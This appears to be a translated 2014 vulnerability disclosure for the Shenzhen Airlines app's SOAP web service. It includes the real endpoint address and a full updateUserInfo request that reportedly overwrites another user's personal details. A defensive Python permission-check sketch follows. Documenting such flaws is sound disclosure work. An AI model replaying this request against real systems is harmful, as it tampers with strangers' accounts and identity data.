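2014-06-16: Details reported to the vendor; awaiting vendor handling
2014-06-21: The vendor has chosen to ignore the vulnerability; details disclosed to the public
Shenzhen Airlines app: unauthorized modification of user information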
http://110.76.39.112:8080/szairmiddle/webservice.ws
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:IwebServiceFilterProxy="http://filterWebservice.iss.com">
  <soap:Body>
    <IwebServiceFilterProxy:filterProxyForws>
      <IwebServiceFilterProxy:in0>
        <xsd:anyType xsi:type="xsd:string">UID201406161148XXXXXX</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">李莉</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">1</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">341100000000000000</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">[email protected]</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string"/>
        <xsd:anyType xsi:type="xsd:string"/>
        <xsd:anyType xsi:type="xsd:string"/>
        <xsd:anyType xsi:type="xsd:string"/>
        <xsd:anyType xsi:type="xsd:string">2</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">test</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">test</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">SwlPfg4jmSxwS/Po5uwbNYP7jZNhfqc/Fre3DI5Uja8=</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">szairmobile</xsd:anyType>
        <xsd:anyType xsi:type="xsd:string">updateUserInfo</xsd:anyType>
      </IwebServiceFilterProxy:in0>
    </IwebServiceFilterProxy:filterProxyForws>
  </soap:Body>
</soap:Envelope>
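After the request is executed, another user's personal information, including items such as the ID card number, is modified.
Check permissions.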
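A sketch of the permission check recommended above, as an added example that is not code from the report or the vendor. It assumes the first positional parameter is the account being modified and the last is the method name, as in the request shown, and that the server holds the caller's UID in an authenticated session (`session_uid`, a hypothetical name); `OWNER_ARG` and the sample values are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/",
      "fp": "http://filterWebservice.iss.com"}
ANY_TYPE = "{http://www.w3.org/2001/XMLSchema}anyType"

# Assumption: for each method, the index of the argument naming the target account.
# Methods without an entry are refused (deny by default).
OWNER_ARG = {"updateUserInfo": 0}


class Forbidden(Exception):
    """The authenticated caller may not perform this call."""


def positional_args(envelope):
    """Return the in0 parameters in order; empty elements become ''."""
    if "<!DOCTYPE" in envelope or "<!ENTITY" in envelope:
        raise ValueError("DTDs are not accepted")
    in0 = ET.fromstring(envelope).find("soap:Body/fp:filterProxyForws/fp:in0", NS)
    if in0 is None:
        raise ValueError("not a filterProxyForws call")
    return [el.text or "" for el in in0.findall(ANY_TYPE)]


def authorize(envelope, session_uid):
    """Return the method name if session_uid owns the account being changed."""
    if not session_uid:
        raise Forbidden("no authenticated session")
    args = positional_args(envelope)
    if not args:
        raise ValueError("missing arguments")
    method = args[-1]
    if method not in OWNER_ARG:
        raise Forbidden("no authorization policy for " + method)
    # The UID in the request body is client-controlled; compare it with the session.
    if args[OWNER_ARG[method]] != session_uid:
        raise Forbidden(method + ": target account is not the caller's")
    return method


def sample_envelope(target_uid):
    """Constructed request with the same shape as the one above (values made up)."""
    params = [target_uid, "name", "szairmobile", "updateUserInfo"]
    body = "".join("<x:anyType>%s</x:anyType>" % p for p in params)
    return ('<s:Envelope xmlns:s="%s" xmlns:f="%s" '
            'xmlns:x="http://www.w3.org/2001/XMLSchema"><s:Body>'
            "<f:filterProxyForws><f:in0>%s</f:in0></f:filterProxyForws>"
            "</s:Body></s:Envelope>" % (NS["soap"], NS["fp"], body))
```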
Severity: No impact (ignored by vendor)
Ignored at: 2014-06-21 23:12
None yet